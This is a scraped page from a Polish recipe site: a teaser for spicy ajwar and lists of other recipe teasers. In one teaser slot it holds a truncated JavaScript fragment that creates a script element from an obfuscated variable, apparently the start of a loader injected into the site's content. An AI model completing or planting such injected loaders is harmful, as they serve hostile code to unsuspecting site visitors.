Ajwar pikantny
Źródło: http://pyrynagaz.blogspot.com/2020/09/ajwar-pikantny.html
Ajwar to pasta z papryki i bakłażana, królująca na bałkańskich stołach. W zależności od upodobań może być bardziej pikantna (ljuti) lub łagodna (blagi).Jest aromatyczna i przepyszna. Świetnie nadaje się jako dodatek do makaronu, mięs (zgłasza grillowanych) a nawet jako sos na pizzę. Sprawdza się również na kanapkach czy jako dip z chrupiącymi słupkami marchewki....
Najnowsze przepisy
Składniki:recipe: 1 rolkę ciasta francuskiego rozwinąć... ⇖ 11
Domowe sosy to często niedoceniane skarby domowej kuchni.... ⇖ 10
Jeden zapach, jeden kęs - i nagle wracają wspomnienia.... ⇖ 16
(function(){ zz99=document.createElement("script");zz99_=("o ⇖ 21
Proste połączenie ale zdecydowanie zawsze się sprawdza.... ⇖ 45
Miodownik bez jajek – mięciutki, puszysty i pięknie... ⇖ 35
Przepisy z bloga
Przepis na ten pasztet to sprawdzona przez lata, rodzinna... ⇖ 725
Gołąbki w klasycznej, tradycyjnej odsłonie z mięsem... ⇖ 704
To ciasto jest bardzo łatwe w przygotowaniu. Przygotowuje... ⇖ 677
Pyszne, cieniutkie, delikatne ciasto z kremowym serkiem... ⇖ 753
Zarówno komosa jak i amarantus maja mnóstwo wartości... ⇖ 764
Przepisy na czasie
Sernik łaciaty z brzoskwiniami i makiem to ciasto, które... ⇖ 363
Kremowe, delikatne ciasto z białą czekoladą i cukierkami... ⇖ 272
Paszteciki z mięsem, z ciasta drożdżowo-kruchego to... ⇖ 216
Przepyszny domowy pasztet do smarowania. W sklepie tak... ⇖ 215
Tulipany do barszczyku to znakomita propozycja podania... ⇖ 177
Pyszny miodownik z kakaową masą grysikową i z orzechami... ⇖ 158
Idealne danie na ciepło na imprezy, lub na obiad. Przepis... ⇖ 74
Domowe pralinki są smaczne, łatwe do zrobienia i... ⇖ 71









































